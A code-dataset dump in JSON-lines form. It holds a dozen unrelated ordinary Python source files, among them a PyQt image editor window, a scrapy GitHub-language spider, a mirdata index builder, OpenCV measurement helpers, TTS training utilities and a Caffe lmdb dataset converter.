If we try to import certain\n# Qt parts before importing matplotlib there can be import errors.\n# For more information: https://github.com/computationalpathologygroup/ASAP/issues/34\nfrom matplotlib import pyplot\n\nfrom PyQt5.QtWidgets import QMainWindow, QWidget, QGridLayout\nfrom PyQt5.QtGui import QImage, QGuiApplication\nfrom PyQt5.QtCore import QEvent\n\nfrom .menu_bar import MenuBar\nfrom .editor import Editor\nfrom .events import ExecuteCommandEvent, DeleteEditorEvent, ChangeActiveEditorEvent, NewSelectionEvent\nfrom .css import PYCTURE_CSS\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Pycture\")\n self.setStyleSheet(PYCTURE_CSS)\n self.setMenuBar(MenuBar(self))\n placeholder_widget = QWidget()\n self.setCentralWidget(placeholder_widget)\n self.setup_size()\n self.editors = {}\n self.active_editor = None\n\n def setup_size(self):\n desktop_size = QGuiApplication.screens()[0].size()\n screen_width = desktop_size.width()\n screen_height = desktop_size.height()\n width = round(0.4 * screen_width)\n height = round(0.4 * screen_height)\n x = (screen_width - width) / 2\n y = height / 2\n self.setGeometry(x, y, width, height)\n\n def customEvent(self, event: QEvent):\n if isinstance(event, ExecuteCommandEvent):\n event.command.execute(self)\n elif isinstance(event, DeleteEditorEvent):\n if event.editor_name == self.active_editor:\n self.active_editor = None\n self.editors.pop(event.editor_name)\n elif isinstance(event, ChangeActiveEditorEvent):\n self.set_active_editor(event.editor_name)\n elif isinstance(event, NewSelectionEvent):\n title = self.get_active_editor().windowTitle() + \"(Selection)\"\n self.add_editor(event.image, title)\n\n else:\n event.ignore()\n\n def add_editor(self, image: QImage = None, name: str = \"\", editor: Editor = None):\n if editor:\n name = editor.windowTitle()\n \n while self.editors.get(name):\n (name, extension) = path.splitext(name)\n name = name + \"+\" + extension\n \n if editor:\n editor.setWindowTitle(name)\n self.editors[name] = editor\n else:\n self.editors[name] = Editor(self, image, name)\n \n self.set_active_editor(name)\n\n def get_active_editor(self) -> Editor:\n return self.editors.get(self.active_editor)\n\n def get_active_editor_name(self) -> str:\n return self.active_editor\n\n def get_editor(self, editor: str) -> Editor:\n return self.editors.get(editor)\n\n def set_active_editor(self, name: str):\n if (self.active_editor):\n self.editors[self.active_editor].set_active(False)\n self.active_editor = name\n self.editors[name].set_active(True)\n\n def get_editor_list(self) -> [Editor]:\n return self.editors\n","repo_name":"miguel-martinr/Pycture","sub_path":"src/pycture/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42947319221","text":"import scrapy\nimport json\nimport re\nclass gitSpider(scrapy.Spider):\n name = 'gitviz spider'\n user = 'torvalds'\n repos_link = 'https://api.github.com/users/'+ user + '/repos'\n start_urls = [repos_link]\n \n # def start_requests():\n\n def parse(self, response):\n json_res = json.loads(response.body_as_unicode())\n first = type(json_res) is list\n if first:\n for item in json_res:\n yield response.follow(item['languages_url'], self.parse)\n else:\n reply = {}\n reply['repo'] = response.url.split('/')[5]\n for key in json_res:\n reply['language'] = key\n reply['byte_count'] = json_res[key]\n yield 
reply","repo_name":"soechun/gitviz","sub_path":"language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29853795330","text":"import argparse\nimport csv\nimport hashlib\nimport json\nimport os\nimport itertools\nimport re\nfrom mirdata.validate import md5\n\n\nacousticbrainz_genre_INDEX_PATH = '../mirdata/datasets/indexes/test_acousticbrainz_genre_index.json'\nACOUSTICBRAINZ_GENRE_ANNOTATION_SCHEMA = ['JAMS']\n\n\ndef make_acousticbrainz_genre_index(data_path):\n index = 0\n datasets = ['tagtraum', 'allmusic', 'lastfm', 'discogs']\n dataset_types = ['validation', 'train']\n f = open(acousticbrainz_genre_INDEX_PATH, 'w')\n f.write('{\\n')\n for dataset, dataset_type in itertools.product(datasets, dataset_types):\n tsv_file = open(os.path.join(data_path, \"acousticbrainz-mediaeval-\" + dataset + \"-\" + dataset_type + \".tsv\"))\n read_tsv = csv.reader(tsv_file, delimiter=\"\\t\")\n next(read_tsv, None)\n read_tsv_list = list(read_tsv)\n for line, row in enumerate(read_tsv_list):\n mbid = \"\"\n track_id = dataset + '#' + dataset_type\n for i, r in enumerate(row):\n track_id = track_id + '#' + r\n if i == 0:\n mbid = r\n ann_path = os.path.join(data_path, \"acousticbrainz-mediaeval-\" + dataset_type, mbid[:2], mbid + \".json\")\n f.write(' \\\"%s\\\": {\\n' % (track_id,))\n f.write(' \\\"data\\\": [\\n')\n f.write(' \\\"%s\\\",\\n' % (ann_path.replace(data_path + '/', ''),))\n f.write(' \\\"%s\\\"\\n' % md5(ann_path))\n f.write(' ]\\n')\n is_the_last = dataset == datasets[-1] and dataset_type == dataset_types[-1] and line == len(read_tsv_list)-1\n if not is_the_last:\n f.write(' },\\n')\n else:\n f.write(' }\\n')\n index += 1\n\n f.write('}')\n\n\ndef main(args):\n make_acousticbrainz_genre_index(args.acousticbrainz_genre_data_path)\n\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser(description='Make acousticbrainz_genre index file.')\n PARSER.add_argument('acousticbrainz_genre_data_path', type=str, help='Path to acousticbrainz_genre data folder.')\n main(PARSER.parse_args())\n # with open(acousticbrainz_genre_INDEX_PATH, 'r') as json_file:\n # data = json.load(json_file)\n # for row in data:\n # print(row)\n\n","repo_name":"sebastianrosenzweig/mirdata","sub_path":"scripts/make_acousticbrainz_genre.py","file_name":"make_acousticbrainz_genre.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"45003942406","text":"from plot_bars import plot_domains\nimport numpy as np, seaborn as sns\nfrom matplotlib.pyplot import figure\nfrom csb.io import load\n#sns.set(style='ticks', palette='Set1', context='notebook', font_scale=1.)\nsns.set(palette='Set2', context='notebook', font_scale=1.5)\n\n\n\ndef load_membership_linh(serial):\n rs = open('../data/Membership/'+str(serial)+'.txt').readlines()[0]\n mbs = rs.split('\\t')\n mbs = np.array([int(c) for c in mbs])\n return mbs\n\n# if False:\n# #proteins = ('pyruvate', 'T7', 'GroEL', 'AST', 'AdH')\n# proteins = ('T7',)\n# #serial = [2733, 441, 1537, 344, 243]\n# serial = [441]\n# for i, name in enumerate(proteins):\n# new_ = []\n# membership = load('../data/{}.pkl'.format(name))\n# membership1 = load_membership_linh(serial[i])\n# new_.append(membership1)\n# new_.append(membership[0])\n# for j in membership[3:]:\n# new_.append(j)\n# print len(membership1), len(j)\n#\n# from csb.io import dump\n#\n# dump(new_, 
'../data/linh/{}.pkl'.format(name))\n\n #load Linh results\n\n\nif True:\n order = (\n 'Literature', 'Ours', 'Spectrus', 'Spectrus (K=2)', 'Spectrus (K=3) *', 'DynDom')\n\n method_dict = {'AdH': ['Ours', 'DynDom', 'Spectrus (K=2)', 'Spectrus (K=3) *'],\n 'AST': ['Ours', 'DynDom', 'Spectrus'],\n 'pyruvate': ['Ours', 'DynDom', 'Spectrus', 'Literature'],\n 'GroEL': ['Ours', 'DynDom', 'Spectrus', 'Literature'],\n 'T7': [ 'Ours','Literature', 'Spectrus', 'DynDom']}\n\n names = {'T7': 'T7 RNA polymerase',\n 'pyruvate': 'Pyruvate phosphate dikinase',\n 'GroEL': 'GroEL',\n 'AdH': 'Alcohol dehydrogenase',\n 'AST': 'Aspartate aminotransferase'}\n\n colors = sns.color_palette()\n\n\n def sort_membership(membership):\n\n new_membership = np.zeros(len(membership), 'i')\n labels = list(set(membership.tolist()))\n counts = map(membership.tolist().count, labels)\n labels = np.array(labels)[np.argsort(counts)[::-1]]\n\n for i, label in enumerate(labels):\n new_membership += i * (membership == label).astype('i')\n\n return new_membership\n\n\n def add_plot(ax, name, ref_name='Literature'):\n\n membership = map(sort_membership, load('../data/linh/{}.pkl'.format(name)))\n methods = method_dict[name]\n indices = map(order.index, methods)\n indices = np.argsort(indices)[::-1]\n membership = map(membership.__getitem__, indices)\n methods = map(methods.__getitem__, indices)\n\n K = max(map(max, membership))\n if ref_name in methods:\n plot_domains(K, membership, colors, methods, 0.55, methods.index(ref_name), ax=ax)\n else:\n plot_domains(K, membership, colors, methods, 0.55, ax=ax)\n ax.annotate(names[name], xy=(0., 0.65), fontsize=16, xycoords='axes fraction')\n ax.grid(False)\n ax.set_ylim(-0.5, 5.5)\n\n fig = figure(figsize=(8, 12))\n\n proteins = ('pyruvate', 'T7', 'GroEL', 'AST', 'AdH')\n n = len(proteins)\n\n ref_names = {'HIV': 'Gibbs (prior 2)'}\n\n for counter, protein in enumerate(proteins, 1):\n ax = fig.add_subplot(n, 1, counter)\n # ax.set_facecolor('Black')\n\n add_plot(ax, protein, ref_name=ref_names.get(protein, 'Literature'))\n\n fig.savefig('../latex/img/fig11.pdf', bbox_inches='tight')","repo_name":"dtklinh/GBRDE","sub_path":"Utils/DrawAssessment.py","file_name":"DrawAssessment.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28501884551","text":"# 167. Two Sum II - Input array is sorted\n\n# Given an array of integers that is already sorted in ascending order,\n# find two numbers such that they add up to a specific target number.\n\n# The function twoSum should return indices of the two numbers such that\n# they add up to the target, where index1 must be less than index2.\n\n# Note:\n# Your returned answers (both index1 and index2) are not zero-based.\n# You may assume that each input would have exactly one solution and you\n# may not use the same element twice.\n\n# Example:\n# Input: numbers = [2,7,11,15], target = 9\n# Output: [1,2]\n# Explanation: The sum of 2 and 7 is 9. 
Therefore index1 = 1, index2 = 2.\n\nfrom typing import List\n\n\nclass Solution:\n    def twoSum(self, numbers: List[int], target: int) -> List[int]:\n        p, q = 0, len(numbers) - 1\n        while numbers[p] + numbers[q] != target:\n            if numbers[p] + numbers[q] > target: q -= 1\n            else: p += 1\n        return [p + 1, q + 1]\n\n\ndef log(correct, res):\n    if len(correct) == len(res) and set(correct) == set(res): print(\"[v]\", res)\n    else: print(\">>> INCORRECT >>>\", correct, \" | \", res)\n\nt = Solution()\n\nlog([1,2], t.twoSum([2,7,11,15], 9))\nlog([3,6], t.twoSum([1,2,3,7,11,48,51,154,234], 51))","repo_name":"DmitryVlaznev/leetcode","sub_path":"167-two-sum-ii-input-array-is-sorted.py","file_name":"167-two-sum-ii-input-array-is-sorted.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23110995601","text":"# coding:UTF-8\n# Xiao Ming has 4 balls in his pocket: red, red, yellow and blue. Each time he randomly takes out one ball, notes its color and puts it back. He draws a ball twice in total. Ignoring order, give all possible color combinations.\n\nimport random\n\nballs = ['r','r','y','b']\n# balls = ['red','red','yellow','blue']\nb = []\nball = ''\nball1 = ''\nballall = [] # all ordered pairs seen so far\nballresult = [] # result\nfor j in range(0, 100):\n    b0 = random.choice(balls)\n    b1 = random.choice(balls)\n    ball = b0 + '&' + b1\n    ball1 = b1 + '&' + b0\n    if ball1 not in (ballall):\n        ballall.append(ball1)\n    # print(ballall)\n    if (ball == ball1) and ball not in(ballresult):\n        ballresult.append(ball)\n\n    elif ball not in (ballall) and ball not in(ballresult):\n        ballresult.append(ball)\n\nprint(ballresult)\n","repo_name":"uyaly/study2018","sub_path":"python/笛卡尔算法/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10146481249","text":"test_=int(input())\nwhile(test_):\n    test_-=1\n    n=int(input())\n    dic={}\n    a=[]\n    a = list(map(int,input().split()))\n    for i in a:\n        if(i in dic):\n            dic[i]+=1\n        else:\n            dic[i]=1\n    if len(dic)==1:\n        print('-1')\n        continue\n    mx,mn=max(dic.values()),min(dic.values())\n    print(mx-mn)\n","repo_name":"Geven1/hackerearth","sub_path":"CodeMonk/Monk being monitor.py","file_name":"Monk being monitor.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19599902600","text":"def evaluar(nombre_archivo):\n\twith open(nombre_archivo, \"r\", encoding=\"utf-8\") as doc:\n\t\tlines = doc.readlines()\n\n\t# Matrix rows come before the first blank line; the search patterns come after it.\n\tblank = next((k for k, line in enumerate(lines) if not line.strip()), len(lines))\n\tmatriz = [line.strip().split() for line in lines[:blank] if line.strip()]\n\tpatterns = [line.strip().split() for line in lines[blank:] if line.strip()]\n\n\twith open(\"resultado.txt\", \"w\", encoding=\"utf-8\") as output:\n\t\tfor pattern in patterns:\n\n\t\t\trows_found = []\n\n\t\t\tfor i in range(len(matriz)):\n\t\t\t\trow = matriz[i]\n\t\t\t\tif len(row) == len(pattern) and match(row, pattern):\n\t\t\t\t\trows_found.append(str(i + 1))\n\n\t\t\t#output.write(f\"{len(rows_found)} veces\\n\")\n\n\t\t\tif rows_found:\n\t\t\t\toutput.write(\" \".join(rows_found) + \"\\n\\n\")\n\t\t\telse:\n\t\t\t\toutput.write(\"\\n\")\n\n\ndef match(row, pattern):\n\tfor j in range(len(row)):\n\t\tif row[j] != pattern[j]:\n\t\t\treturn False\n\treturn True","repo_name":"renatovc/Python","sub_path":"FPI/Controles Laboratorio/Control_2.py","file_name":"Control_2.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42359844566","text":"import argparse\nimport torch\nfrom 
pytorch_lightning import Trainer\n\nfrom grammaticality_annotation.fine_tune_grammaticality_nn import CHILDESGrammarDataModule, \\\n CHILDESGrammarModel\n\n\ndef main(args):\n model = CHILDESGrammarModel.load_from_checkpoint(args.model_checkpoint)\n hparams = model.hparams\n dm = CHILDESGrammarDataModule(val_split_proportion=hparams.val_split_proportion,\n model_name_or_path=hparams.model_name_or_path,\n eval_batch_size=hparams.eval_batch_size,\n train_batch_size=hparams.train_batch_size,\n train_datasets=hparams.train_datasets,\n val_datasets=hparams.val_datasets,)\n dm.setup(\"fit\")\n\n trainer = Trainer(\n accelerator=\"auto\",\n devices=1 if torch.cuda.is_available() else None, # limiting got iPython runs\n )\n\n model.val_error_analysis = True\n\n print(\"\\n\\n\\nValidation:\")\n trainer.validate(model, dm)\n\n\ndef parse_args():\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\n \"--model-checkpoint\",\n type=str,\n required=True,\n )\n\n args = argparser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n main(args)\n","repo_name":"mitjanikolaus/childes-communicative-feedback","sub_path":"grammaticality_annotation/eval_grammaticality_nn.py","file_name":"eval_grammaticality_nn.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30098695620","text":"import cv2\r\nimport numpy as np\r\n\r\n## Function to find object in an image using contours\r\ndef getContours(img, cThr=[100, 100], showCanny=False, minArea=1000, filter=0, draw=False):\r\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) ## convert image to grayscale\r\n imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1) ## create blurred image to smooth for preprocessing\r\n imgCanny = cv2.Canny(imgBlur, cThr[0], cThr[1]) ## create Canny image detecting edges using threshold values for preprocessing\r\n kernel = np.ones((5, 5)) ## create 5x5 pixel kernel\r\n imgDil = cv2.dilate(imgCanny, kernel, iterations=3) ## dilate the image using the kernel to increase edge sizes for preprocessing\r\n imgThre = cv2.erode(imgDil, kernel, iterations=2) ## erode image using the kernel to decrease edge sizes for preprocessing\r\n if showCanny: cv2.imshow('Canny', imgThre) ## display image\r\n contours, hierarchy = cv2.findContours(imgThre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) ## find and store edges/contours of image\r\n finalCountours = [] ## create list to store final contours\r\n # loop through each contour\r\n for i in contours:\r\n area = cv2.contourArea(i) ## calculate area of contour\r\n if area > minArea:\r\n peri = cv2.arcLength(i, True) ## calculate perimeter of contour\r\n approx = cv2.approxPolyDP(i, 0.02 * peri, True) ## approximate the overall contour to ignore minor variations from perimeter\r\n bbox = cv2.boundingRect(approx) ## draw bounding box around contour\r\n if filter > 0:\r\n if len(approx) == filter:\r\n finalCountours.append([len(approx), area, approx, bbox, i]) ## add contour to list of final contours if length matches filter parameter\r\n else:\r\n finalCountours.append([len(approx), area, approx, bbox, i]) ## add contour to list of final contours if filter parameter is zero\r\n finalCountours = sorted(finalCountours, key=lambda x: x[1], reverse=True) ## sort contours from largest to smallest\r\n if draw:\r\n for con in finalCountours:\r\n cv2.drawContours(img, con[4], -1, (0, 0, 255), 3) ## draw contours on image\r\n return img, finalCountours\r\n\r\n## Function 
to reorder points of object to consistent order for calculation\r\ndef reorder(myPoints):\r\n    # print(myPoints.shape)\r\n    myPointsNew = np.zeros_like(myPoints) ## create numpy array of zeros in same shape as points array\r\n    myPoints = myPoints.reshape((4, 2)) ## reshape array for rectangles\r\n    add = myPoints.sum(1) ## add the points\r\n    myPointsNew[0] = myPoints[np.argmin(add)] ## set first point as minimum of sum\r\n    myPointsNew[3] = myPoints[np.argmax(add)] ## set last point as maximum of sum\r\n    diff = np.diff(myPoints, axis=1) ## subtract the points\r\n    myPointsNew[1] = myPoints[np.argmin(diff)] ## set second point as minimum of difference\r\n    myPointsNew[2] = myPoints[np.argmax(diff)] ## set third point as maximum of difference\r\n    return myPointsNew\r\n\r\n## Function to warp an image to dimensions of uniform background\r\ndef warpImg(img, points, w, h, pad=20):\r\n    # print(points)\r\n    points = reorder(points) ## reorder the points\r\n    pts1 = np.float32(points) ## convert points to float\r\n    pts2 = np.float32([[0, 0], [w, 0], [0, h], [w, h]]) ## convert second set of points to float using image dimensions\r\n    matrix = cv2.getPerspectiveTransform(pts1, pts2) ## transform the first set of points to second set\r\n    imgWarp = cv2.warpPerspective(img, matrix, (w, h)) ## warp the image to fill with background\r\n    imgWarp = imgWarp[pad:imgWarp.shape[0] - pad, pad:imgWarp.shape[1] - pad] ## add pad to image for calculations\r\n    return imgWarp\r\n\r\n## Function to calculate the size of an object using points\r\ndef findDis(pts1, pts2):\r\n    return ((pts2[0] - pts1[0]) ** 2 + (pts2[1] - pts1[1]) ** 2) ** 0.5","repo_name":"tannerkhemphill/tello-drone-ms-project","sub_path":"MeasureFinder.py","file_name":"MeasureFinder.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29875820960","text":"import datetime\nimport os\nfrom collections import OrderedDict\n\nimport matplotlib\nimport numpy as np\nfrom torch import save\nfrom torch.nn.utils import clip_grad_norm\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef check_update(model, grad_clip, grad_top):\n    \"\"\"\n    Check gradient against limits\n    \"\"\"\n    skip_flag = False\n    grad_norm = clip_grad_norm(parameters=model.parameters(), max_norm=grad_clip)\n    if np.isinf(x=grad_norm):\n        print(\"gradient is inf\")\n        skip_flag = True\n    elif grad_norm > grad_top:\n        print(\"gradient is above the top level\")\n        skip_flag = True\n    return grad_norm, skip_flag\n\n\ndef lr_decay(init_lr, global_step, warmup_steps):\n    warmup_steps = float(warmup_steps)\n    step = global_step + 1.\n    lr = init_lr * warmup_steps ** 0.5 * np.minimum(step * warmup_steps ** -1.5,\n                                                   step ** -0.5)\n    return lr\n\n\ndef save_checkpoint(model, optimizer, model_loss, out_path,\n                    current_step, epoch):\n    checkpoint_path = 'checkpoint_{}.pth.tar'.format(current_step)\n    checkpoint_path = os.path.join(out_path, checkpoint_path)\n    print(\"\\n | > Checkpoint saving : {}\".format(checkpoint_path))\n\n    new_state_dict = _trim_model_state_dict(model.state_dict())\n    state = {'model': new_state_dict,\n             'optimizer': optimizer.state_dict(),\n             'step': current_step,\n             'epoch': epoch,\n             'linear_loss': model_loss,\n             'date': datetime.date.today().strftime(\"%B %d, %Y\")}\n    save(state, checkpoint_path)\n\n\ndef _trim_model_state_dict(state_dict):\n    r\"\"\"Remove 'module.' prefix from state dictionary. It is necessary as it\n    is loaded the next time by model.load_state(). 
Otherwise, it complains\n about the torch.DataParallel()\"\"\"\n\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n return new_state_dict\n\n\ndef create_experiment_folder(root_path):\n \"\"\" Create a folder with the current date and time \"\"\"\n date_str = datetime.datetime.now().strftime(\"%B-%d-%Y_%I:%M%p\")\n output_folder = os.path.join(root_path, date_str)\n os.makedirs(output_folder, exist_ok=True)\n print(\" > Experiment folder: {}\".format(output_folder))\n return output_folder\n\n\ndef plot_alignment(alignment, info=None):\n fig, ax = plt.subplots(figsize=(16, 10))\n im = ax.imshow(alignment.T, aspect='auto', origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n plt.tight_layout()\n fig.canvas.draw()\n data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n plt.close()\n return data\n\n\ndef plot_spectrogram(linear_output, audio):\n spectrogram = audio._denormalize(linear_output)\n fig = plt.figure(figsize=(16, 10))\n plt.imshow(spectrogram.T, aspect=\"auto\", origin=\"lower\")\n plt.colorbar()\n plt.tight_layout()\n fig.canvas.draw()\n data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n plt.close()\n return data\n","repo_name":"IvKosar/text2speech","sub_path":"utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43351725752","text":"# convert all other datasets to lmdb\nimport os\nimport cv2\nimport shutil\nimport random\nimport numpy as np\nimport caffe\nimport lmdb\nimport json\nimport argparse\nfrom caffe.proto import caffe_pb2\nimport xml.etree.ElementTree as ET\nfrom tqdm import tqdm\n\nCLASSES={\n \"Face\":[\"face\"],\n \"fddb\":[\"face\"],\n 'wider':['face'],\n \"Mask\": ['face','face_mask'],\n \"Head\":[\"head\"],\n \"Person\":[\"pedestrians\"],\n \"Hand\":[\"hand\"],\n \"Car\":[\"car\"],\n \"tower\":[\"tower\"],\n \"insect\":[\"leconte\",\"boerner\",\"armandi\",\"linnaeus\",\"coleoptera\",\"acuminatus\"],\n \"voc\": ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse','motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train','tvmonitor']\n}\n\nclass Registry(object):\n def __init__(self):\n self._module_dict = dict()\n def _register_module(self, name, func):\n module_name = name\n if module_name in self._module_dict:\n raise KeyError('{} is already registered'.format(module_name))\n self._module_dict[module_name] = func\n def register_module(self, name, cls):\n self._register_module(name, cls)\n return cls\n def get(self, key):\n return self._module_dict.get(key, None)\n\n#conver anno to datum\n# img, [h,w,c] uint8 image using cv2.imread\n# bboxes, N*5 labels, each is [xmin,ymin,xmax,ymax,label], with label index from 0\ndef anno2datum(img,bboxes):\n if len(bboxes) == 0:\n return\n annotated_datum = caffe_pb2.AnnotatedDatum()\n annotated_datum.type = annotated_datum.BBOX\n datum = annotated_datum.datum \n datum.channels = img.shape[2]\n datum.width = img.shape[1]\n datum.height = img.shape[0]\n datum.encoded = True\n datum.label = -1\n datum.data = 
cv2.imencode('.jpg',img)[1].tobytes()\n groups = annotated_datum.annotation_group\n for bbox in bboxes:\n found_group = False\n instance_id = 0\n label = int(bbox[4]) + 1 # background is 0\n for group in groups:\n if group.group_label == label:\n if len(group.annotation) == 0:\n instance_id = 0\n else:\n instance_id = len(group.annotation)\n found_group= True\n annotation = group.annotation.add()\n break\n if not found_group:\n group = groups.add()\n instance_id = 0\n group.group_label = label\n annotation = group.annotation.add()\n annotation.instance_id = instance_id\n annotation.bbox.xmin = bbox[0] * 1.0 /img.shape[1]\n annotation.bbox.ymin = bbox[1] * 1.0 /img.shape[0]\n annotation.bbox.xmax = bbox[2] * 1.0 /img.shape[1]\n annotation.bbox.ymax = bbox[3] * 1.0 /img.shape[0]\n return annotated_datum\n\n#for voc xml annotation\n# data/voc\n# --images\n# --Annotations\n# --train.txt\n# --val.txt\n# each line in *.txt only contain filename like 000001.jpg\ndef xml2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n listfile_path = data_dir+\"/\"+args.split+\".txt\"\n if not os.path.exists(listfile_path):\n listfile_path = data_dir+\"/ImageSets/Main\"+\"/\"+args.split+\".txt\"\n with open(listfile_path) as f:\n cat2label = {cat: i for i, cat in enumerate(CLASSES[args.dataset])}\n lines=f.readlines()\n for line in tqdm(lines):\n filename=line.split()[0]\n if filename.endswith(\"jpg\"):\n filepath=data_dir+\"/images/\"+filename\n xml_path=data_dir+\"/Annotations/\"+filename[:-4]+\".xml\"\n else:\n filepath=data_dir+\"/images/\"+filename+\".jpg\"\n xml_path=data_dir+\"/Annotations/\"+filename+\".xml\"\n img = cv2.imread(filepath)\n if img is None:\n print(filepath+\" cannot read\")\n continue\n if not os.path.exists(xml_path):\n print(xml_path+\" has no annotation\")\n continue\n tree = ET.parse(xml_path)\n root = tree.getroot()\n bboxes = []\n for obj in root.findall('object'):\n name = obj.find('name').text\n if name not in CLASSES[args.dataset]:\n print(filepath+\" has no expect label \"+name)\n continue\n label = cat2label[name]\n difficult = int(obj.find('difficult').text)\n if difficult:\n continue\n bbox = obj.find('bndbox')\n x = float(bbox.find('xmin').text)\n y = float(bbox.find('ymin').text)\n x2 = float(bbox.find('xmax').text)\n y2 = float(bbox.find('ymax').text)\n bbox = [x,y,x2,y2,label]\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename,annotated_datum.SerializeToString())\n#for data from paddledetection\n# data/insect\n# --JPEGImages\n# --Annotations\n# --train_list.txt\n# --val_list.txt\n# --test_list.txt\n# each line in *.txt contain filepath like JPEGImages/0001.jpg Annotations/0001.xml\ndef paddle2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n labelpath = data_dir+\"/\"+args.split+\"_list.txt\"\n with open(labelpath) as f:\n cat2label = {cat: i for i, cat in enumerate(CLASSES[args.dataset])}\n lines = f.readlines()\n for line in tqdm(lines):\n line = line.strip()\n 
filename = line.split(\" \")[0]\n imgpath = data_dir+\"/\"+filename\n xml_path = data_dir+\"/\"+line.split(\" \")[1]\n img = cv2.imread(imgpath)\n if img is None:\n print(imgpath+\" cannot read\")\n continue\n if not os.path.exists(xml_path):\n print(xml_path+\" has no annotation\")\n continue\n tree = ET.parse(xml_path)\n root = tree.getroot()\n bboxes = []\n for obj in root.findall('object'):\n name = obj.find('name').text\n if name not in CLASSES[args.dataset]:\n print(imgpath+\" has no expect label \"+name)\n continue\n label = cat2label[name]\n difficult = int(obj.find('difficult').text)\n if difficult:\n continue\n bbox = obj.find('bndbox')\n x = float(bbox.find('xmin').text)\n y = float(bbox.find('ymin').text)\n x2 = float(bbox.find('xmax').text)\n y2 = float(bbox.find('ymax').text)\n bbox = [x,y,x2,y2,label]\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename.encode(),annotated_datum.SerializeToString())\n#txt annotation\n# data/***\n# --images\n# --train.txt\n# --val.txt\n# each line: imgpath,xmin,ymin,xmax,ymax, label\n# label index from 1\ndef txt2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n annopath = data_dir+\"/\"+args.split+\".txt\"\n with open(annopath) as f:\n lines = f.readlines()\n for line in tqdm(lines):\n items = line.strip().split(\" \")\n filename = items[0]\n imgpath = data_dir+\"/images/\"+filename\n img = cv2.imread(imgpath)\n if img is None:\n print(\"cannot read \"+imgpath)\n continue\n bboxes = []\n labels = items[1].split(\",\")\n for i in range(len(labels)//5): # integer division: each box uses 5 fields\n xmin = float(labels[i*5])\n ymin = float(labels[i*5+1])\n xmax = float(labels[i*5+2])\n ymax = float(labels[i*5+3])\n label = int(labels[i*5+4])\n bboxes.append([xmin,ymin,xmax,ymax,label-1])\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename.encode(),annotated_datum.SerializeToString())\n\n#for brainwash head dataset\n# 